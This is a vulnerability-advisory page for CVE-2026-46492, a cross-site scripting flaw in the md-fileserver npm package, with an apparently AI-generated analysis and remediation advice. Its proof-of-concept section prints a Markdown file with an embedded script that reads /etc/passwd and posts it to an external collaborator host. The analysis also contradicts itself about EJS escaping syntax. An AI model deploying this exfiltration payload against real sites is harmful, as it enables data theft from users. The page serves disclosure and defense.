Skip to main content

md-fileserver CVE-2026-46492

| EUVDEUVD-2026-35496 HIGH
Basic XSS (CWE-80)
2026-05-21 https://github.com/commenthol/md-fileserver GHSA-32q2-hhr5-6qvv
7.2
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.2 HIGH
AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 21, 2026 - 18:30 vuln.today
Analysis Generated
May 21, 2026 - 18:30 vuln.today

DescriptionGitHub Advisory

Summary

A cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML-including <script> tags-is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain.

Details

An attacker can craft malicious Markdown content containing <script> tags or event handlers (e.g., <img onerror=...>). When this Markdown is viewed or previewed, the embedded JavaScript executes in the victim’s browser.

Vulnerable Components

config.js → markdownIt: { html: true } (Lines 26-30) The Markdown renderer is explicitly configured to allow raw HTML.

lib/markd.js (Lines 33-58) Renders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.

lib/pages/template.html The rendered Markdown is injected into the HTML template using <%= markdown %> without sanitization or output encoding.

PoC

Create a pwn.md

# Hello

<script>
  fetch('/etc/passwd', { credentials: 'include' })
    .then(r => r.text())
    .then(t => fetch('https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil', { method: 'POST', body: t }));
</script>

Open it on browser. <img width="944" height="238" alt="image" src="https://github.com/user-attachments/assets/cd9e1396-9f4b-4a4b-bc2a-d7530c0c00ac" /> View the HTTP request in Burp Collaborator. <img width="1328" height="468" alt="image" src="https://github.com/user-attachments/assets/9faa65ad-73ec-42d0-9ce3-ea78b15294d8" />

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to:

  • Session hijacking
  • Account takeover
  • Credential theft
  • Defacement or injection of malicious content
  • Exfiltration of sensitive data via API tokens, CSRF tokens, or user information

This affects all users who can view Markdown content within the application.

AnalysisAI

Stored/reflected cross-site scripting in the md-fileserver npm package (versions prior to 1.10.3) allows remote unauthenticated attackers to execute arbitrary JavaScript in a viewer's browser by uploading or supplying Markdown files containing raw HTML or script tags. The vulnerability stems from markdown-it being configured with html:true and rendered output being injected into the template without sanitization or output encoding. No public exploit identified at time of analysis beyond the vendor-provided PoC, and the issue is not currently listed in CISA KEV.

Technical ContextAI

md-fileserver is a Node.js/npm-published HTTP file server that renders Markdown files for browser viewing. The root cause is CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page / Basic XSS): config.js initializes markdown-it with the html:true option (lines 26-30), which intentionally permits raw HTML passthrough; lib/markd.js (lines 33-58) renders Markdown without invoking a sanitizer such as DOMPurify or sanitize-html; and lib/pages/template.html injects the result with the unescaped EJS construct <%= markdown %> rather than the escaping <%- ... %> form (note: in EJS <%= is actually escaping while <%- is unescaped, so the advisory's reference to <%= markdown %> being unsanitized indicates the rendered HTML string is treated as trusted). The affected package is identified by CPE pkg:npm/md-fileserver.

RemediationAI

Vendor-released patch: upgrade md-fileserver to 1.10.3 or later via npm (npm install md-fileserver@^1.10.3 or update package.json and lockfile). See the advisory at https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv for confirmation. If immediate upgrade is not possible, compensating controls include patching config.js to set markdownIt: { html: false } (this disables raw HTML in Markdown - side effect: any legitimate inline HTML in existing Markdown files will be escaped and rendered as text rather than HTML), inserting a sanitization step in lib/markd.js using DOMPurify or sanitize-html on the rendered output before templating, restricting network access to the service to trusted users only (e.g., bind to localhost or place behind authenticated reverse proxy), and adding a strict Content-Security-Policy response header that forbids inline scripts (script-src 'self' with no 'unsafe-inline') - note that CSP will also block any legitimate inline scripts used by the application itself.

Share

CVE-2026-46492 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy